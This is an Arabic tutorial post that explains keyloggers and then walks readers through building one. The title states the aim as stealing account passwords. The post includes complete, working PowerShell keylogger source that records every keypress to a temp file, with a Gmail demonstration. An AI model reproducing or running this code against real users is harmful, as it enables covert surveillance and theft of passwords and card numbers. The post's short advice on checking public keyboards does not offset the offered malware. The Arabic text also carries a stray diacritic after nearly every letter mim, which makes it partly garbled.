تعرف على أداة راصد لوحة المًفاتيح keylogger وقمً بإنشاء واحدة بنفسك لسرقة كلمًات السر للحسابات

راصد لوحة المًفاتيح "keylogger" هو أحد برامًج التجسس الخفية حيث يقومً بتسجيل كافة مًا يُكتب بلوحة المًفاتيح ويتمً تخزينها في سجل لنقلها إلى المًتجسس، ويستخدمً لمًراقبة أجهزة مًعينة لمًعرفة مًا يُكتب عليها مًثل وكلمًات الدخول وأرقامً بطاقات الائتمًان والبيانات السرية ويتمً ذلك غالبًا دون وعي المًستخدمً، ويستخدمً keylogger على نطاق واسع عن طريق الهاكرز ويمًكن استخدامًه أيضاً للكشف عن التعدي على مًمًتلكات الغير.

بالإضافة إلى برمًجيات الرصد keylogger توجد قطعة توصل بين لوحة المًفاتيح واللوحة الأمً تعمًل نفس الشيء لذا عند استخدامً أي جهاز في مًكان عامً أو مًقهى إنترنت تأكد بأن لوحة المًفاتيح مًوصولة بشكل مًباشر ولا توجد أي قطعة أو وصلة وسطية، كذلك توجد بعض البرامًج الخبيثة تتمًكن مًن تسجيل كل مًا يدخل بواسطة لوحة المًفاتيح اللاسلكية حتى المًشفرة مًنها لذا ينصح دائمًا باستخدامً لوحات المًفاتيح السلكية في استعمًال الدخول للحسابات البنكية أو المًعلومًات ذات السرية أو المًهمًة.
والآن بعد تعرفت على مًاهية أداة راصد لوحة المًفاتيح سوف ننتقل الآن إلى طريقة إنشاء نمًوذج بسيط له باستخدامً إطار عمًل يعرف باسمً PowerShell ISE حتى تفهمً طريقة عمًله جيداً
أولاً: قمً بفتح قائمًة ابدأ اكتب Windows PowerShell ISE في شريط البحث ثمً قمً بفتحه، أو اكتب powershell_ise في Run ثمً قمً بفتحه.
ثانياً: قمً بنسخ التعليمًة البرمًجية المًوجودة أدناه ولصقها في مًوجه الأوامًر PowerShell، ثمً انقر على أيقونة التشغيل.

#requires -Version 2 function Start-KeyLogger($Path="$env:temp\keylogger.txt") { # Signatures for API Calls $signatures = @' [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] public static extern short GetAsyncKeyState(int virtualKeyCode); [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int GetKeyboardState(byte[] keystate); [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int MapVirtualKey(uint uCode, int uMapType); [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags); '@ # load signatures and make members available $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru # create output file $null = New-Item -Path $Path -ItemType File -Force try { Write-Host 'Recording key presses. Press CTRL+C to see results.' -ForegroundColor Red # create endless loop. When user presses CTRL+C, finally-block # executes and shows the collected key presses while ($true) { Start-Sleep -Milliseconds 40 # scan all ASCII codes above 8 for ($ascii = 9; $ascii -le 254; $ascii++) { # get current key state $state = $API::GetAsyncKeyState($ascii) # is key pressed? if ($state -eq -32767) { $null = [console]::CapsLock # translate scan code to real code $virtualKey = $API::MapVirtualKey($ascii, 3) # get keyboard state for virtual keys $kbstate = New-Object Byte[] 256 $checkkbstate = $API::GetKeyboardState($kbstate) # prepare a StringBuilder to receive input key $mychar = New-Object -TypeName System.Text.StringBuilder # translate virtual key $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0) if ($success) { # add key to logger file [System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode) } } } } } finally { # open logger file in Notepad notepad $Path } } # records all key presses until script is aborted by pressing CTRL+C # will then open the file with collected key codes Start-KeyLogger

ثالثاً: الآن افتح أي برنامًج واضغط على بعض المًفاتيح، لقد فتحت Gmail كمًثال.

رابعاً: بمًجرد الانتهاء مًن الكتابة اضغط على CTRL + C لفتح مًلف notepad يحتوي على ضغطات المًفاتيح المًسجلة.

المًوضوع مًن طرف عبدالرحمًن زكي.